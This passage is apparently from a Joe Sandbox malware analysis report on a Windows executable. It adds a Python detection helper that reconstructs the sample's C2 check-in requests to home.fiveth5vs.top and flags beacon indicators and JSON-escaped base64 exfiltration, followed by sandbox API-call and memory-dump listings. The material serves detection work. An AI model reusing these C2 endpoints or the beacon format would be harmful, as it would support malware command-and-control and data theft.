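The sessions above show the whole check-in sequence as the sandbox captured it: a GET to home.fiveth5vs.top with no User-Agent header (one of the signatures listed at the top of the report), a 31-byte JSON POST to the same path with the body { "id1": "0", "data": "Done1" }, an external-IP lookup at httpbin.org/ip, and, earlier, the large outbound segments whose bodies are base64 with JSON-escaped slashes (\/), answered by a one-byte "0". The Python below is an added triage helper written for this report; it is neither Joe Sandbox code nor code from the sample. It rebuilds the two requests from the report (their lengths match the 98 and 171 bytes the report counts), applies the checks a detection engineer would derive from this traffic, and turns a Data Raw line back into the escaped base64 fragment. Two things are assumptions, marked as such in the code: the beacon path pattern (20 letters followed by 10 digits) is generalised from the single URL observed, and reading those 10 digits as a Unix timestamp is an inference; the report does not say what the path, argument=0 or Done1 mean.

```python
import json
import re
from datetime import datetime, timezone

# Requests reconstructed from the report's HTTP sessions with CRLF line endings
# restored. Their lengths equal the report's "Bytes transferred" values (98 and
# 171), a cheap sanity check when rebuilding traffic from a rendered report.
GET_REQUEST = (
    b"GET /KhxTILlSHLygUudVWlQk1735537737?argument=0 HTTP/1.1\r\n"
    b"Host: home.fiveth5vs.top\r\n"
    b"Accept: */*\r\n\r\n"
)
POST_REQUEST = (
    b"POST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1\r\n"
    b"Host: home.fiveth5vs.top\r\n"
    b"Accept: */*\r\n"
    b"Content-Type: application/json\r\n"
    b"Content-Length: 31\r\n\r\n"
    b'{ "id1": "0", "data": "Done1" }'
)
# Hex prefix of the 2472-byte outbound segment at 15:42:06.591 CET, copied
# from the report's first "Data Raw" line above (82 bytes).
DATA_RAW_EXCERPT = (
    "Data Raw: 53 6e 31 2b 58 36 6b 4c 78 38 68 5c 2f 66 5c 2f 50 36 5c 2f 77 "
    "43 66 52 74 57 4b 5c 2f 55 58 5c 2f 41 49 4a 54 66 38 45 39 5c 2f 77 42 "
    "6e 37 39 73 48 77 68 38 61 50 6a 52 2b 30 68 6f 6d 71 5c 2f 45 57 32 38 "
    "4f 66 46 37 57 50 68 44 34 4e 38 46 70"
)

# ASSUMPTION: the beacon URI shape is generalised from the one URL observed
# (20 ASCII letters + 10 digits, optional ?argument=N). Validate against more
# samples before turning this into a production detection.
BEACON_PATH = re.compile(r"^/[A-Za-z]{20}(\d{10})(\?argument=\d+)?$")
B64_ALPHABET = re.compile(r"^[A-Za-z0-9+/=]+$")


def decode_data_raw(line: str) -> bytes:
    """Turn a Joe Sandbox 'Data Raw: xx xx ...' line back into bytes."""
    hex_part = line.split("Data Raw:", 1)[-1]
    return bytes.fromhex(hex_part)


def parse_http_request(raw: bytes) -> dict:
    """Minimal HTTP/1.1 request parser: request line, lower-cased headers, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}


def checkin_payload(req: dict):
    """Return the JSON body of a check-in POST, or None if the request is not one."""
    if req["method"] != "POST":
        return None
    if not req["headers"].get("content-type", "").startswith("application/json"):
        return None
    try:
        return json.loads(req["body"].decode("utf-8"))
    except (UnicodeDecodeError, ValueError):
        return None


def path_timestamp(path: str):
    """ASSUMPTION: the trailing 10 digits are a Unix epoch (here 2024-12-30 05:48:57 UTC)."""
    m = BEACON_PATH.match(path)
    if not m:
        return None
    return datetime.fromtimestamp(int(m.group(1)), tz=timezone.utc)


def triage_request(req: dict) -> list:
    """Checks derived from this report's traffic; each hit is a readable reason."""
    findings = []
    if "user-agent" not in req["headers"]:
        findings.append("no User-Agent header")
    if BEACON_PATH.match(req["path"]):
        findings.append("beacon-style path: 20 letters + 10-digit epoch")
    payload = checkin_payload(req)
    if isinstance(payload, dict) and {"id1", "data"} <= set(payload):
        findings.append("check-in JSON body with keys id1/data")
    return findings


def unescape_json_base64(text: str):
    """Undo JSON slash escaping (backslash-slash to slash) in a base64 stream.

    Returns None when the text carries no escaped slashes or is not base64-shaped,
    so a plain-text body is not mistaken for the exfil encoding seen here.
    """
    if "\\/" not in text:
        return None
    cleaned = text.replace("\\/", "/")
    return cleaned if B64_ALPHABET.match(cleaned) else None


if __name__ == "__main__":
    for raw in (GET_REQUEST, POST_REQUEST):
        req = parse_http_request(raw)
        print(req["method"], req["path"], triage_request(req))
    fragment = decode_data_raw(DATA_RAW_EXCERPT).decode("ascii")
    print(unescape_json_base64(fragment))
```

The escaped-slash check is the most durable of these indicators: a base64 stream in which every "/" arrives as "\/" means the sender JSON-serialised the blob, which fits the Content-Type: application/json check-in and survives a change of hostname or path. The fragment here is a mid-stream slice, so decoding it to bytes gives nothing readable; the recoverable fact is the encoding, not the content.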


[Behavior graphs not recoverable from text: two time-series plots over the first 60 s of execution (y-axes 0 to 100 and 0.0 to 20 MB) and a per-process activity distribution broken down by File, Registry and Network.]

                                Target ID:0
                                Start time:09:42:01
                                Start date:31/12/2024
                                Path:C:\Users\user\Desktop\joE9s9sbv0.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\joE9s9sbv0.exe"
                                Imagebase:0x1d0000
                                File size:4'508'160 bytes
                                MD5 hash:2CE78AC3287A074E14BD8B4AF226FD09
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Execution Graph

                                Execution Coverage

                                Dynamic/Packed Code Coverage

                                Signature Coverage

                                Execution Coverage:4.6%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:23.7%
                                Total number of Nodes:194
                                Total number of Limit Nodes:26
                                execution_graph 24971 1d255d 24972 559f70 24971->24972 24973 1d256c GetSystemInfo 24972->24973 24974 1d2589 24973->24974 24975 1d25a0 GlobalMemoryStatusEx 24974->24975 24980 1d25ec 24975->24980 24976 1d263c GetDriveTypeA 24978 1d2655 GetDiskFreeSpaceExA 24976->24978 24976->24980 24977 1d2762 24979 1d27d6 KiUserCallbackDispatcher 24977->24979 24978->24980 24981 1d27f8 24979->24981 24980->24976 24980->24977 24982 1d28d9 FindFirstFileW 24981->24982 24983 1d2906 FindNextFileW 24982->24983 24984 1d2928 24982->24984 24983->24983 24983->24984 25082 20b3c0 25083 20b3cb 25082->25083 25084 20b3ee 25082->25084 25087 1d76a0 send 25083->25087 25088 209290 25083->25088 25085 20b3ea 25087->25085 25089 1d76a0 send 25088->25089 25091 2092e5 25089->25091 25090 209392 25090->25085 25091->25090 25092 209335 WSAIoctl 25091->25092 25092->25090 25093 209366 25092->25093 25093->25090 25094 209371 setsockopt 25093->25094 25094->25090 25095 1d29ff FindFirstFileA 25096 1d2a31 25095->25096 25097 1d2a5c RegOpenKeyExA 25096->25097 25098 1d2a93 25097->25098 25099 1d2ade CharUpperA 25098->25099 25101 1d2b0a 25099->25101 25100 1d2bf9 QueryFullProcessImageNameA 25102 1d2c3b CloseHandle 25100->25102 25101->25100 25104 1d2c64 25102->25104 25103 1d2df1 CloseHandle 25105 1d2e23 25103->25105 25104->25103 24985 1d3d5e 24986 1d3d30 24985->24986 24986->24985 24987 1d3d90 24986->24987 24989 1e0ab0 24986->24989 24992 1e05b0 24989->24992 24991 1e0acd 24991->24986 24993 1e07c7 24992->24993 24994 1e05bd 24992->24994 24993->24991 24994->24993 24995 1e07ef 24994->24995 24996 1e0707 WSAEventSelect 24994->24996 25006 1d76a0 24994->25006 24995->24993 25000 1e0847 24995->25000 25002 1e6fa0 24995->25002 24996->24993 24996->24994 24999 1e09e8 WSAEnumNetworkEvents 24999->25000 25001 1e09d0 WSAEventSelect 24999->25001 25000->24993 25000->24999 25000->25001 25001->24999 25001->25000 25003 1e6fd4 25002->25003 25005 1e6feb 25002->25005 25004 1e7207 select 25003->25004 25003->25005 
25004->25005 25005->25000 25007 1d76e6 send 25006->25007 25008 1d76c0 25006->25008 25009 1d76c9 25007->25009 25008->25007 25008->25009 25009->24994 25010 284720 25011 284728 25010->25011 25015 284733 25011->25015 25016 289270 25011->25016 25013 284860 25019 284950 25013->25019 25023 28a440 25016->25023 25018 289297 25018->25013 25020 284966 25019->25020 25021 284aa0 gethostname 25020->25021 25022 2849c5 25020->25022 25021->25020 25021->25022 25022->25015 25024 28a46b 25023->25024 25026 28a48b GetAdaptersAddresses 25024->25026 25055 28a4db 25024->25055 25025 28aa03 RegOpenKeyExA 25027 28ab70 RegOpenKeyExA 25025->25027 25028 28aa27 RegQueryValueExA 25025->25028 25043 28a4a6 25026->25043 25026->25055 25031 28ab90 25027->25031 25032 28ac34 RegOpenKeyExA 25027->25032 25029 28aacc RegQueryValueExA 25028->25029 25030 28aa71 25028->25030 25034 28ab0e 25029->25034 25035 28ab66 RegCloseKey 25029->25035 25030->25029 25040 28aa85 RegQueryValueExA 25030->25040 25031->25032 25033 28acf8 RegOpenKeyExA 25032->25033 25054 28ac54 25032->25054 25036 28ad14 25033->25036 25037 28ad56 RegEnumKeyExA 25033->25037 25034->25035 25044 28ab1e RegQueryValueExA 25034->25044 25035->25027 25036->25018 25037->25036 25039 28ad9b 25037->25039 25038 28a4f3 GetAdaptersAddresses 25050 28a505 25038->25050 25038->25055 25041 28ae16 RegOpenKeyExA 25039->25041 25042 28aab3 25040->25042 25045 28addf RegEnumKeyExA 25041->25045 25046 28ae34 RegQueryValueExA 25041->25046 25042->25029 25043->25038 25043->25055 25049 28ab4c 25044->25049 25045->25036 25045->25041 25048 28af43 RegQueryValueExA 25046->25048 25056 28adaa 25046->25056 25047 28a527 GetAdaptersAddresses 25047->25055 25051 28b052 RegQueryValueExA 25048->25051 25048->25056 25049->25035 25050->25047 25050->25055 25052 28adc7 RegCloseKey 25051->25052 25051->25056 25052->25045 25053 28afa0 RegQueryValueExA 25053->25056 25054->25033 25055->25025 25055->25036 25056->25048 25056->25051 25056->25052 25056->25053 25057 29a920 25058 29a944 25057->25058 25059 
29a94b 25058->25059 25060 29a977 send 25058->25060 25106 29b180 25108 29b2e3 25106->25108 25110 29b19b 25106->25110 25110->25108 25111 29b2a9 getsockname 25110->25111 25113 29b020 closesocket 25110->25113 25114 29af30 25110->25114 25118 29b060 25110->25118 25123 29b020 25111->25123 25113->25110 25115 29af4c 25114->25115 25116 29af63 socket 25114->25116 25115->25116 25117 29af52 25115->25117 25116->25110 25117->25110 25119 29b080 25118->25119 25120 29b0b0 connect 25119->25120 25121 29b0bf WSAGetLastError 25119->25121 25122 29b0ea 25119->25122 25120->25121 25121->25119 25121->25122 25122->25110 25124 29b029 25123->25124 25125 29b052 25123->25125 25126 29b04b closesocket 25124->25126 25127 29b03e 25124->25127 25125->25110 25126->25125 25127->25110 25128 29a080 25131 299740 25128->25131 25130 29a09b 25132 299780 25131->25132 25136 29975d 25131->25136 25133 299925 RegOpenKeyExA 25132->25133 25132->25136 25134 29995a RegQueryValueExA 25133->25134 25133->25136 25135 299986 RegCloseKey 25134->25135 25135->25136 25136->25130 25137 29a8c0 25138 29a903 recvfrom 25137->25138 25139 29a8e6 25137->25139 25140 29a8ed 25138->25140 25139->25138 25139->25140 25061 1d2f17 25069 1d2f2c 25061->25069 25062 1d31d3 25063 1d2fb3 RegOpenKeyExA 25063->25069 25064 1d315c RegEnumKeyExA 25065 1d31b2 RegCloseKey 25064->25065 25064->25069 25065->25069 25066 1d3046 RegOpenKeyExA 25067 1d3089 RegQueryValueExA 25066->25067 25066->25069 25068 1d313b RegCloseKey 25067->25068 25067->25069 25068->25069 25069->25062 25069->25063 25069->25064 25069->25066 25069->25068 25070 1d31d7 25073 1d31f4 25070->25073 25071 1d3200 25072 1d32dc CloseHandle 25072->25071 25073->25071 25073->25072 25074 2095b0 25075 2095c8 25074->25075 25076 2095fd 25074->25076 25075->25076 25078 20a150 25075->25078 25079 20a15f 25078->25079 25081 20a1d0 25078->25081 25080 20a181 getsockname 25079->25080 25079->25081 25080->25081 25081->25076 25141 208b50 25142 208b6b 25141->25142 25156 208bb5 25141->25156 25142->25156 25157 208b8f 
25142->25157 25158 20a550 25142->25158 25144 208bfc 25148 208c35 25144->25148 25149 208c1f connect 25144->25149 25154 208cb2 25144->25154 25144->25156 25145 208cd9 SleepEx getsockopt 25146 208d18 25145->25146 25150 208d43 25146->25150 25146->25154 25147 20a150 getsockname 25155 208dff 25147->25155 25152 20a150 getsockname 25148->25152 25149->25148 25153 20a150 getsockname 25150->25153 25152->25157 25153->25156 25154->25147 25154->25155 25154->25156 25155->25156 25171 1d78b0 closesocket 25155->25171 25157->25145 25157->25154 25157->25156 25159 20a575 25158->25159 25164 20a597 25159->25164 25173 1d75e0 25159->25173 25161 1d78b0 closesocket 25163 20a713 25161->25163 25162 20a811 setsockopt 25170 20a83b 25162->25170 25163->25144 25164->25162 25169 20a69b 25164->25169 25164->25170 25166 20af56 25167 20af5d 25166->25167 25166->25169 25167->25163 25168 20a150 getsockname 25167->25168 25168->25163 25169->25161 25169->25163 25170->25169 25178 2367e0 ioctlsocket 25170->25178 25172 1d78c5 25171->25172 25172->25156 25174 1d75ef 25173->25174 25175 1d7607 socket 25173->25175 25174->25175 25177 1d7643 25174->25177 25176 1d762b 25175->25176 25176->25164 25177->25164 25178->25166 25179 1ed5e0 25180 1ed652 WSAStartup 25179->25180 25181 1ed5f0 25179->25181 25180->25181

                                Executed Functions

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
• Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID:
                                • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                • API String ID: 0-1590685507
                                • Opcode ID: 076fe8ffee2c8929f01d7b6a3771530c3dea4c2460ac5f5ed232e1ab54fd0280
                                • Instruction ID: 7576d0a113d19d1ff95e3413ff6d2ad4d6a2f39180d8ad67a8956f7aa6868743
                                • Opcode Fuzzy Hash: 076fe8ffee2c8929f01d7b6a3771530c3dea4c2460ac5f5ed232e1ab54fd0280
                                • Instruction Fuzzy Hash: 1BC2E031A143459FD764CF28C580B6AB7E1BF98314F04C66DEC988B6A2D771EDA4CB81

                                Control-flow Graph

                                APIs
                                • GetSystemInfo.KERNELBASE ref: 001D2579
                                • GlobalMemoryStatusEx.KERNELBASE ref: 001D25CC
                                • GetDriveTypeA.KERNELBASE ref: 001D2647
                                • GetDiskFreeSpaceExA.KERNELBASE ref: 001D267E
                                • KiUserCallbackDispatcher.NTDLL ref: 001D27E2
                                • FindFirstFileW.KERNELBASE ref: 001D28F8
                                • FindNextFileW.KERNELBASE ref: 001D291F
                                Strings
                                Memory Dump Source
• Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
• Associated dumps: the same sixteen .sdmp files listed under the first Memory Dump Source entry above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                • String ID: @$`$gkw
                                • API String ID: 3271271169-2923762694
                                • Opcode ID: 24a3e7b03a02b39b219b109ebc56c8009665b346e5cbb90c6f57e745e78241ad
                                • Instruction ID: a4ae8f7aabf307e79569f4ddfd4c7dd3ca71a978573050d1e373d6b490850623
                                • Opcode Fuzzy Hash: 24a3e7b03a02b39b219b109ebc56c8009665b346e5cbb90c6f57e745e78241ad
                                • Instruction Fuzzy Hash: C5D1C2B49047099FCB50EF68C58569EBBF1BF48344F10896EE898D7351E7349A88CF92

                                Control-flow Graph

                                control_flow_graph 1299 1d29ff-1d2a2f FindFirstFileA 1300 1d2a38 1299->1300 1301 1d2a31-1d2a36 1299->1301 1302 1d2a3d-1d2a91 call 686790 call 686820 RegOpenKeyExA 1300->1302 1301->1302 1307 1d2a9a 1302->1307 1308 1d2a93-1d2a98 1302->1308 1309 1d2a9f-1d2b0c call 686790 call 686820 CharUpperA call 558da0 1307->1309 1308->1309 1317 1d2b0e-1d2b13 1309->1317 1318 1d2b15 1309->1318 1319 1d2b1a-1d2b92 call 686790 call 686820 call 558e80 call 558e70 1317->1319 1318->1319 1328 1d2bcc-1d2c66 QueryFullProcessImageNameA CloseHandle call 558da0 1319->1328 1329 1d2b94-1d2ba3 1319->1329 1339 1d2c6f 1328->1339 1340 1d2c68-1d2c6d 1328->1340 1332 1d2ba5-1d2bae 1329->1332 1333 1d2bb0-1d2bca call 558e68 1329->1333 1332->1328 1333->1328 1333->1329 1341 1d2c74-1d2ce9 call 686790 call 686820 call 558e80 call 558e70 1339->1341 1340->1341 1350 1d2dcf-1d2e1c call 686790 call 686820 CloseHandle 1341->1350 1351 1d2cef-1d2d49 call 558bb0 call 558da0 1341->1351 1361 1d2e23-1d2e2e 1350->1361 1362 1d2d99-1d2dad 1351->1362 1363 1d2d4b-1d2d63 call 558da0 1351->1363 1364 1d2e37 1361->1364 1365 1d2e30-1d2e35 1361->1365 1362->1350 1363->1362 1371 1d2d65-1d2d7d call 558da0 1363->1371 1367 1d2e3c-1d2ed6 call 686790 call 686820 1364->1367 1365->1367 1380 1d2ed8-1d2ee1 1367->1380 1381 1d2eea 1367->1381 1371->1362 1377 1d2d7f-1d2d97 call 558da0 1371->1377 1377->1362 1385 1d2daf-1d2dc9 call 558e68 1377->1385 1380->1381 1383 1d2ee3-1d2ee8 1380->1383 1384 1d2eef-1d2f16 call 686790 call 686820 1381->1384 1383->1384 1385->1350 1385->1351
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
• Associated dumps: the same sixteen .sdmp files listed under the first Memory Dump Source entry above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                • String ID: 0$Alw
                                • API String ID: 2406880114-1042436145
                                • Opcode ID: 8a019a474659ddb7ae88e01e594e1d670c7f9e9fa303dcb9ce733c60757fe7e6
                                • Instruction ID: 3f86a4ece295578cb5f5d3ca41fed63ad05ed3f6fc98e4899536d894e1f09a8b
                                • Opcode Fuzzy Hash: 8a019a474659ddb7ae88e01e594e1d670c7f9e9fa303dcb9ce733c60757fe7e6
                                • Instruction Fuzzy Hash: 10E105B09047059FDB40EF68D9856ADBBF5AF88344F10887EE898D7354E7789988CF42

                                Control-flow Graph

                                • Graph of the function starting at 001E05B0 (entry block 1e05b0-1e05b7; calls WSAEventSelect and WSAEnumNetworkEvents) is not reproduced in this text export
                                APIs
                                • WSAEventSelect.WS2_32(?,8508C483,?), ref: 001E0711
                                • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 001E09DD
                                • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 001E09FC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: EventSelect$EnumEventsNetwork
                                • String ID: multi.c
                                • API String ID: 2170980988-214371023
                                • Opcode ID: cd8a546aa95b94684d7af2120f73e42e326a6bc4d0d893fc540446ab0409547c
                                • Instruction ID: a0acb316779dbc68a1a52cc32cf3e21c0ced0df1c0b10b3c18da8ac027ed3f0c
                                • Opcode Fuzzy Hash: cd8a546aa95b94684d7af2120f73e42e326a6bc4d0d893fc540446ab0409547c
                                • Instruction Fuzzy Hash: 9FD1C275A087819FE712CF65C881B6F77E5FF98348F04482DF88586282E7B4E985CB52

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                • Graph of the function starting at 0029B180 (entry block 29b180-29b195; calls getsockname) is not reproduced in this text export
                                APIs
                                • getsockname.WS2_32(-00000020,-00000020,?), ref: 0029B2B6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: getsockname
                                • String ID: ares__sortaddrinfo.c$cur != NULL
                                • API String ID: 3358416759-2430778319
                                • Opcode ID: 7b043eb175a39f1f35e413007c7b26073329c991a9a5c17ca2d5f1c10cfea12e
                                • Instruction ID: 5cb721ef8bd7d839c2fe6c28d228dba4f92a89b4f02db77690bc9ccee2a43266
                                • Opcode Fuzzy Hash: 7b043eb175a39f1f35e413007c7b26073329c991a9a5c17ca2d5f1c10cfea12e
                                • Instruction Fuzzy Hash: 7DC19E316143059FDF19DF24DA90A6A77E1FF88704F45896CE8498B3A1DB30ED65CB81
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a060ac8d22658b8df05f1b371fe8f3dd7a289d359ec924f02fc546c16892594c
                                • Instruction ID: f9121a11d0bbfd19a816a6ed0c514c02ebd5a56939bd8203faf6d5ed53c6dc89
                                • Opcode Fuzzy Hash: a060ac8d22658b8df05f1b371fe8f3dd7a289d359ec924f02fc546c16892594c
                                • Instruction Fuzzy Hash: D191143060CB8A8BE7358B2A98947BFB2D5FFC5760F148B2CE899431D4EB709D40D691
                                APIs
                                • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0028712E,?,?,?,00001001,00000000), ref: 0029A90D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmp
